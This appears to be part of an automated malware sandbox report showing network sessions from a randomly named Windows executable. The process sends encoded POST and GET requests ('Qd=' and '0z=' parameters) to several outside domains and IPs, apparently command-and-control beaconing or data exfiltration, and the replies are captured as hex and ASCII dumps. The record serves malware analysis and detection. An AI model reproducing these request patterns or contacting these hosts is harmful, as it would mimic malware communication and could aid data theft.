                        Data Ascii: Qd=7WgpfID4oFY5Dthhx9YnvPCSTYkoD15zEWmCyecPWQteHceFzt0QdqEsIHtbW8rdpv5Lg0AGcc8qGGMuRhw9ieyNS0fG/WWJU3TG8LXSvLtPXI9YhDBHzidD6OIeE7JAH6J2MTAXu9FaFJx6U3RV8pEp5i1fKpc/Qgw7wXA/zA0pp0WY+qBrl6E6te6zuFtQZw==


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.4 | 64996 | 5.144.130.52 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:05.518990040 CEST | 738 | OUT | POST /ifo8/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.aflaksokna.com
                        Origin: http://www.aflaksokna.com
                        Referer: http://www.aflaksokna.com/ifo8/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6c 39 65 48 35 61 46 79 73 30 51 65 71 45 73 44 6e 74 65 5a 63 72 73 70 76 38 6f 67 78 34 47 63 63 34 71 47 44 6f 75 52 53 49 79 6a 4f 79 50 61 55 66 49 37 57 57 4a 55 33 54 47 38 4c 54 6f 76 4c 31 50 57 34 4e 59 75 47 74 41 36 43 64 41 7a 75 49 65 54 72 4a 45 48 36 4a 49 4d 53 73 78 75 37 5a 61 46 49 42 36 55 6b 4a 57 7a 70 45 6e 39 69 30 51 47 59 31 4b 5a 78 31 48 76 30 6f 6e 30 7a 34 31 6f 79 48 43 76 62 67 38 33 36 67 4a 77 5a 7a 48 6a 47 51 5a 43 35 78 30 65 56 56 31 57 73 50 4a 6a 58 64 75 30 38 50 50 75 59 6b 3d
                        Data Ascii: Qd=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVl9eH5aFys0QeqEsDnteZcrspv8ogx4Gcc4qGDouRSIyjOyPaUfI7WWJU3TG8LTovL1PW4NYuGtA6CdAzuIeTrJEH6JIMSsxu7ZaFIB6UkJWzpEn9i0QGY1KZx1Hv0on0z41oyHCvbg836gJwZzHjGQZC5x0eVV1WsPJjXdu08PPuYk=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.4 | 64997 | 5.144.130.52 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:08.061650038 CEST | 10820 | OUT | POST /ifo8/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.aflaksokna.com
                        Origin: http://www.aflaksokna.com
                        Referer: http://www.aflaksokna.com/ifo8/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6d 64 65 48 76 6d 46 79 50 73 51 66 71 45 73 64 58 74 66 5a 63 72 31 70 76 45 30 67 78 6b 57 63 65 77 71 46 68 67 75 58 6e 6b 79 70 4f 79 50 57 30 66 4a 2f 57 57 6d 55 7a 33 43 38 49 37 6f 76 4c 31 50 57 37 56 59 71 54 42 41 32 69 64 44 36 4f 49 6f 45 37 4a 6f 48 36 67 77 4d 53 6f 48 75 4e 70 61 43 6f 52 36 53 58 74 57 36 70 45 6c 78 43 31 50 47 59 70 6a 5a 31 55 32 76 31 63 64 30 30 77 31 72 32 2b 6f 79 76 56 71 6b 70 67 4f 75 70 53 73 37 6e 77 6f 42 4c 39 65 61 6e 64 4c 4d 6f 37 6c 6f 48 63 42 68 65 54 52 78 65 67 49 47 33 56 45 6c 65 72 43 41 42 7a 2b 4b 45 67 35 49 57 30 55 7a 5a 78 65 77 61 4c 4c 6e 34 62 4b 47 44 6f 52 41 52 39 7a 36 4e 6d 4e 70 30 57 75 36 51 70 5a 37 67 41 49 2b 74 4a 36 65 78 42 71 75 42 41 70 76 65 4d 63 6e 6f 75 5a 44 49 70 4b 36 39 4c 6c 7a 4d 6a 4a 68 77 46 73 6b 62 4f 55 46 42 78 45 43 62 39 30 45 76 64 69 53 4b 37 47 47 38 62 36 47 37 6f [TRUNCATED]
                        Data Ascii: Qd=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 [TRUNCATED]


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.4 | 64998 | 5.144.130.52 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:10.606331110 CEST | 444 | OUT | GET /ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.aflaksokna.com
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:20.394939899 CEST | 1156 | IN | HTTP/1.1 302 Found
                        Connection: close
                        content-type: text/html
                        content-length: 771
                        date: Tue, 03 Sep 2024 08:45:20 GMT
                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                        location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.4 | 64999 | 161.97.168.245 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:34.016371965 CEST | 721 | OUT | POST /p6o9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.qiluqiyuan.buzz
                        Origin: http://www.qiluqiyuan.buzz
                        Referer: http://www.qiluqiyuan.buzz/p6o9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 66 53 32 54 4d 6c 58 45 4d 6c 56 79 74 43 6a 6d 61 7a 54 59 6a 5a 75 55 52 77 42 66 72 78 30 62 51 4f 71 34 34 79 68 75 56 50 7a 71 31 38 75 6e 75 2f 72 65 38 56 61 56 64 6b 48 52 59 75 50 4f 62 49 48 67 66 47 64 78 57 78 4c 30 62 4a 62 70 68 79 48 4a 33 6c 55 75 47 57 50 34 55 37 77 50 52 63 2b 66 68 6a 6d 4f 73 2f 38 79 39 39 39 31 4f 44 35 69 77 73 56 35 7a 53 79 63 79 37 31 4b 6d 78 4e 63 39 4b 2b 61 45 43 6f 42 67 50 61 6f 46 6b 49 58 78 54 58 48 6a 2f 53 4e 66 35 6f 5a 68 55 44 65 49 54 47 36 76 74 48 69 65 53 79 33 6a 69 55 76 41 3d 3d
                        Data Ascii: Qd=UkDfb8hhEzv8KfS2TMlXEMlVytCjmazTYjZuURwBfrx0bQOq44yhuVPzq18unu/re8VaVdkHRYuPObIHgfGdxWxL0bJbphyHJ3lUuGWP4U7wPRc+fhjmOs/8y9991OD5iwsV5zSycy71KmxNc9K+aECoBgPaoFkIXxTXHj/SNf5oZhUDeITG6vtHieSy3jiUvA==
                        Sep 3, 2024 10:45:34.598315954 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: W/"66cd104a-b96"
                        Content-Encoding: gzip
                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                        Sep 3, 2024 10:45:34.598408937 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.4 | 65000 | 161.97.168.245 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:36.582380056 CEST | 741 | OUT | POST /p6o9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.qiluqiyuan.buzz
                        Origin: http://www.qiluqiyuan.buzz
                        Referer: http://www.qiluqiyuan.buzz/p6o9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 38 61 32 57 72 35 58 4d 4d 6c 53 33 74 43 6a 39 4b 7a 58 59 6a 56 75 55 55 41 72 66 5a 6c 30 62 79 57 71 33 5a 79 68 37 56 50 7a 6c 56 38 72 6a 75 2f 77 65 38 5a 38 56 64 6f 48 52 59 36 50 4f 65 6b 48 67 4d 2b 53 77 47 78 4a 38 37 4a 5a 6b 42 79 48 4a 33 6c 55 75 47 43 31 34 55 6a 77 4f 68 4d 2b 4f 31 33 70 48 4d 2f 7a 6c 4e 39 39 34 75 44 39 69 77 74 43 35 79 65 59 63 30 6e 31 4b 6e 68 4e 63 4d 4b 78 42 30 43 75 65 77 4f 32 68 68 39 6d 62 6a 4b 39 48 51 4c 64 4f 73 39 4f 52 48 46 5a 50 35 79 52 6f 76 4a 30 2f 5a 62 47 36 67 66 64 30 4c 68 63 39 35 6d 6f 48 71 68 67 57 58 56 47 37 75 61 44 75 46 6f 3d
                        Data Ascii: Qd=UkDfb8hhEzv8K8a2Wr5XMMlS3tCj9KzXYjVuUUArfZl0byWq3Zyh7VPzlV8rju/we8Z8VdoHRY6POekHgM+SwGxJ87JZkByHJ3lUuGC14UjwOhM+O13pHM/zlN994uD9iwtC5yeYc0n1KnhNcMKxB0CuewO2hh9mbjK9HQLdOs9ORHFZP5yRovJ0/ZbG6gfd0Lhc95moHqhgWXVG7uaDuFo=
                        Sep 3, 2024 10:45:37.169241905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:37 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: W/"66cd104a-b96"
                        Content-Encoding: gzip
                        Sep 3, 2024 10:45:37.169294119 CEST | 370 | IN | Data Raw: (binary continuation of the gzip-encoded body; hex and ASCII dump omitted)


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.4 | 65001 | 161.97.168.245 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:39.124440908 CEST | 10823 | OUT | POST /p6o9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.qiluqiyuan.buzz
                        Origin: http://www.qiluqiyuan.buzz
                        Referer: http://www.qiluqiyuan.buzz/p6o9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:39.695467949 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:39 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: W/"66cd104a-b96"
                        Content-Encoding: gzip
                        Sep 3, 2024 10:45:39.695763111 CEST | 370 | IN | Data Raw: (binary continuation of the gzip-encoded body; hex and ASCII dump omitted)


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.4 | 65002 | 161.97.168.245 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:41.674700022 CEST | 445 | OUT | GET /p6o9/?Qd=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.qiluqiyuan.buzz
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:42.270127058 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:45:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 2966
                        Connection: close
                        Vary: Accept-Encoding
                        ETag: "66cd104a-b96"
                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                        Sep 3, 2024 10:45:42.270142078 CEST | 224 | IN | Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                        Sep 3, 2024 10:45:42.270152092 CEST | 1236 | IN | Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                        Sep 3, 2024 10:45:42.270163059 CEST | 224 | IN | Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s">
                        Sep 3, 2024 10:45:42.270172119 CEST | 250 | IN | Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.4 | 65003 | 3.33.130.190 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:47.317398071 CEST | 709 | OUT | POST /45sz/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.omexai.info
                        Origin: http://www.omexai.info
                        Referer: http://www.omexai.info/45sz/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=9m4WgTCjo+FGTDe5QhzfQjYZ/m/kPKYr5NBARUtX4FKQCgX9rVVNfMrsJXpEVE+OOTKmjhq1OLhENH0AE70DhtbtB7E99xNji/MgDKS0Jh3zWhOwrqjuzcQPkneQmDS9Y87Jgqfk02fazqxv+H0q+Rqihn1EEQteCYgr3OHIhaLWYVqbp6O/xfGdXmUq9bisVw==


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.4 | 65004 | 3.33.130.190 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:49.862255096 CEST | 729 | OUT | POST /45sz/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.omexai.info
                        Origin: http://www.omexai.info
                        Referer: http://www.omexai.info/45sz/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43uQCAn96kVNeMrsB3pLbk/COTHbjkS1OL1ENGEAEIMMntbvObE/zRNji/MgDL2SJhvzWwewpILpwcQOhXeQiDS5Y87vgv3e0wDazu5vwyAplhrnln0ISQMWKNphoIr2orWzdT7B4LvojfiuKhdewYflOyzNhBEloj9u1o5XeuY0KDc=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.2.4 | 65005 | 3.33.130.190 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:52.414859056 CEST | 10811 | OUT | POST /45sz/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.omexai.info
                        Origin: http://www.omexai.info
                        Referer: http://www.omexai.info/45sz/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.2.4 | 65006 | 3.33.130.190 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:54.952425957 CEST | 441 | OUT | GET /45sz/?0z=mDcdcR8&Qd=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.omexai.info
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:55.388154984 CEST | 389 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Tue, 03 Sep 2024 08:45:55 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0z=mDcdcR8&Qd=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY="}</script></head></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.2.4 | 65007 | 218.247.68.184 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:01.274671078 CEST | 703 | OUT | POST /yzen/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.dfbio.net
                        Origin: http://www.dfbio.net
                        Referer: http://www.dfbio.net/yzen/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xAc2wXbNH66dU9xL6YD0/OFBcw==
